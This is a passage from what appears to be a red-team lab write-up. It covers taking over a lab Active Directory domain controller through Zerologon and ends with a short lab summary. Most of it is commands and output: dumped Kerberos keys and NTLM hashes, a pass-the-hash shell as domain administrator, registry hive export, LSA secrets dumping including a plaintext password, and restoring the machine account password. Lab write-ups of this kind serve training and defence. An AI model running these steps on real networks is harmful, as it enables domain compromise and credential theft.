redteam.red\mail:des-cbc-md5:1cf4ae8f86ae7a57
redteam.red\mail:rc4_hmac:518b98ad4178a53695dc997aa02d455c
redteam.red\sqlserver:aes256-cts-hmac-sha1-96:8cbec6f7a0bee31aff4125699eac76686eefc0679462538f36fa356d6c5a0bff
redteam.red\sqlserver:aes128-cts-hmac-sha1-96:9f9a23b3cbeecdb578d03edfa0026645
redteam.red\sqlserver:des-cbc-md5:a82fd5942692a26b
redteam.red\sqlserver:rc4_hmac:6a59bf65a4957ac67e5fb4e1c221939c
redteam.red\saulgoodman:aes256-cts-hmac-sha1-96:9a83bbd25f7d5389c6a34f22a06dcb227b553bbf1ed474fc2015ce5887709e66
redteam.red\saulgoodman:aes128-cts-hmac-sha1-96:7eb9516a11ec08e76c9c082984f46ec2
redteam.red\saulgoodman:des-cbc-md5:648ae0c18552e098
redteam.red\saulgoodman:rc4_hmac:c0e1f147edf7462134f07e389c5466e2
redteam.red\gu:aes256-cts-hmac-sha1-96:1518123ec70fdaf12860bf64e1b04b8ae999201bb82235e9a14c4a57678d976d
redteam.red\gu:aes128-cts-hmac-sha1-96:a7b34ec3bea5e0c3d7d513e6586b5aba
redteam.red\gu:des-cbc-md5:a140a754d9a4ad5e
redteam.red\gu:rc4_hmac:82a28aff9a3be5385b87c4928b54a66f
redteam.red\apt404:aes256-cts-hmac-sha1-96:52f7cad15cf6b51fb59b6df3197a9d985f644103bf7579122763930c4bd8abf4
redteam.red\apt404:aes128-cts-hmac-sha1-96:747e129fb486e7a580eb10b626f9c825
redteam.red\apt404:des-cbc-md5:ea25a4206d515ed5
redteam.red\apt404:rc4_hmac:ba0b26eb2595bc0a639d986537433e5d
redteam.red\adduser:aes256-cts-hmac-sha1-96:b01407e707eb93f8532b94fee89afd53fad38307aacc3379d354d4881b66b388
redteam.red\adduser:aes128-cts-hmac-sha1-96:a95deab4cb8d649374cd6d069ee33ba1
redteam.red\adduser:des-cbc-md5:b3f7bfa8673445ad
redteam.red\adduser:rc4_hmac:168df3659b5f75ab35645606839e5677
redteam.red\saul:aes256-cts-hmac-sha1-96:d00c6721bf8e23bd9a7590eacb9b6273acceb7cf1fa7b28f7bd0e1f3b886e770
redteam.red\saul:aes128-cts-hmac-sha1-96:5431d09ed23795f4ff41d09e994b5c24
redteam.red\saul:des-cbc-md5:3d8573fb5743ba16
redteam.red\saul:rc4_hmac:518b98ad4178a53695dc997aa02d455c
OWA$:aes256-cts-hmac-sha1-96:1271116d501ec893a7d7ba3f9e7940479e92b7d5891b46cad928ad86db6556f7
OWA$:aes128-cts-hmac-sha1-96:7a3a3427c735a644b1b529d47b2e56d2
OWA$:des-cbc-md5:8c80267f97f48a10
OWA$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0
SQLSERVER-2008$:aes256-cts-hmac-sha1-96:1212a6c60c8d9c77d6b97ea431a57671860c38490085f31236e62ac81af83064
SQLSERVER-2008$:aes128-cts-hmac-sha1-96:802c860d60b37ce3b3bdef19e8a7c45f
SQLSERVER-2008$:des-cbc-md5:640b685e9e1c5bfe
SQLSERVER-2008$:rc4_hmac:2dae08cafb67b4537b7d5871084c961d
WORK-7$:aes256-cts-hmac-sha1-96:3db39e59a08bb731c708a72d183c266a6bd03badd75369ff96eb18817f59153c
WORK-7$:aes128-cts-hmac-sha1-96:b5252b1abc361879091a6b385304dec0
WORK-7$:des-cbc-md5:1a2f37d5a4409175
WORK-7$:rc4_hmac:f085f13639b3de3c78de926c0719d36d
[*] Cleaning up...
```

This gives the domain administrator's hash:

redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::

Log in with the wmiexec script to obtain a shell on the DC with domain administrator privileges.

```
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7 redteam.red/administrator@10.10.10.8
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445  ...  OK
[*] SMBv2.1 dialect used
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6007  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
redteam\administrator
```

Read the flag on the desktop.

Finally, the DC's machine account password has to be restored.

Export the registry hives.

```
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
```

Download them to the local machine with lget.

```
lget system.save
lget sam.save
lget security.save
```

Delete the saved hive files from the target.

```
del /f system.save
del /f sam.save
del /f security.save
```

Recover the DC's original NTLM hash from sam.save, security.save and system.save.

```
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x4b30f6b8ed622d5a2ef12930e01d238e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c486b8140b308841f22f170d1524268:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:029ace5dc91c3c37874f1a968c50f58cde29d543bd28a7ff9b0f32af5d16cb3ede2c04090ec9177c5c9145d43d6ea81b0549b20c8325b8c488f6c0fb83fa12890ae029e539651e632224926a0a4ea8b187350042147c52d6b4ea7eb1139f1f2f8ed8a598442f1e14f7ed2df1b1364f7249a313aafb92884848b2b99d71f075059a649c81b965a5725e07970487607a61f7bd256462d8f6a34f7ab74f6b43dbc4f7631eced9cda9c237e060524dec813aa0ba8d265d1b21e421a1dd3216ac768e49440390b2bdbb256a754dcfce8d7e5309ee5ffc8951c45fdf334f427ffc3f73bd0c8b9734af242d43a9fd29a3818886
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd9d2844fee5220c64134c4dd6af1cef55ca83c32
dpapi_userkey:0x972935b9a0f29be77b88a5e9aafaab1068649a3a
[*] L$ASP.NETAutoGenKeys2.0.50727.5420
 0000   E3 1A 39 7D 76 DF A9 6E  B9 58 F9 0F BC 7D C5 60   ..9}v..n.X...}.`
 0010   BA BA E6 BD 15 DE 26 D9  26 81 04 86 C5 50 00 1A   ......&.&....P..
 0020   11 98 C0 BD 1E CE 1F 0E  CC A4 08 EF 5E 7A 42 F6   ............^zB.
 0030   BD 96 83 8A 75 85 FF F6  FC 33 F0 8B 4B A5 1A 11   ....u....3..K...
 0040   4B 68 BD 65 25 8E 23 69  20 E0 2A 88 3A 02 0D C4   Kh.e%.#i .*.:...
 0050   84 CF F5 E1 50 79 E6 04                            ....Py..
L$ASP.NETAutoGenKeys2.0.50727.5420:e31a397d76dfa96eb958f90fbc7dc560babae6bd15de26d926810486c550001a1198c0bd1ece1f0ecca408ef5e7a42f6bd96838a7585fff6fc33f08b4ba51a114b68bd65258e236920e02a883a020dc484cff5e15079e604
[*] NL$KM
 0000   C2 09 A6 FB 68 5E 76 E3  CA CF 0D 64 C3 3F 97 15   ....h^v....d.?..
 0010   57 BF 0B 8A 2C 5E 84 D6  CC 42 EC DF E3 7A F9 9B   W...,^...B...z..
 0020   AE 8A D4 88 7F B1 DF D7  42 CD DB CE 07 57 3C 4C   ........B....W<L
 0030   10 E0 0A F9 C8 C7 7F 25  39 6B DC 3D 6D 3E 9D 7F   .......%9k.=m>..
NL$KM:c209a6fb685e76e3cacf0d64c33f971557bf0b8a2c5e84d6cc42ecdfe37af99bae8ad4887fb1dfd742cddbce07573c4c10e00af9c8c77f25396bdc3d6d3e9d7f
[*] Cleaning up...
```

This yields the $MACHINE.ACC value:

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5

Take the second half (the NT hash) and use it to restore the password.

proxychains4 python3 reinstall_original_pw.py owa 10.10.10.8 cbc48b0b50c4cdd834e6498afd3c39e5

Run impacket's secretsdump.py again to try dumping all domain credentials.

```
proxychains4 python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445 <--socket error or timeout!
[-] RemoteOperations failed: [Errno Connection error (10.10.10.8:445)] [Errno 111] Connection refused
[*] Cleaning up...
```

The dump now fails, which indicates that the password was restored successfully.

With that, the whole lab has been taken.

04

Lab summary

The external phase and the first part of the internal phase follow roughly the same route as the previous write-up; this time MSF was used for getting sessions, proxying and the related tasks. The domain phase uses different techniques from last time: after reading SQLSERVER-2008's system information, look up privilege escalation vulnerabilities for that exact version and attempt to escalate; to take the domain controller, CVE-2020-1472 (Zerologon) was used, which blanks the DC machine account password, so after exploitation the original password must be restored to minimise the impact on the environment. For environments with several network tiers, MSF's SOCKS proxy feels more convenient than CS or other proxy tools.
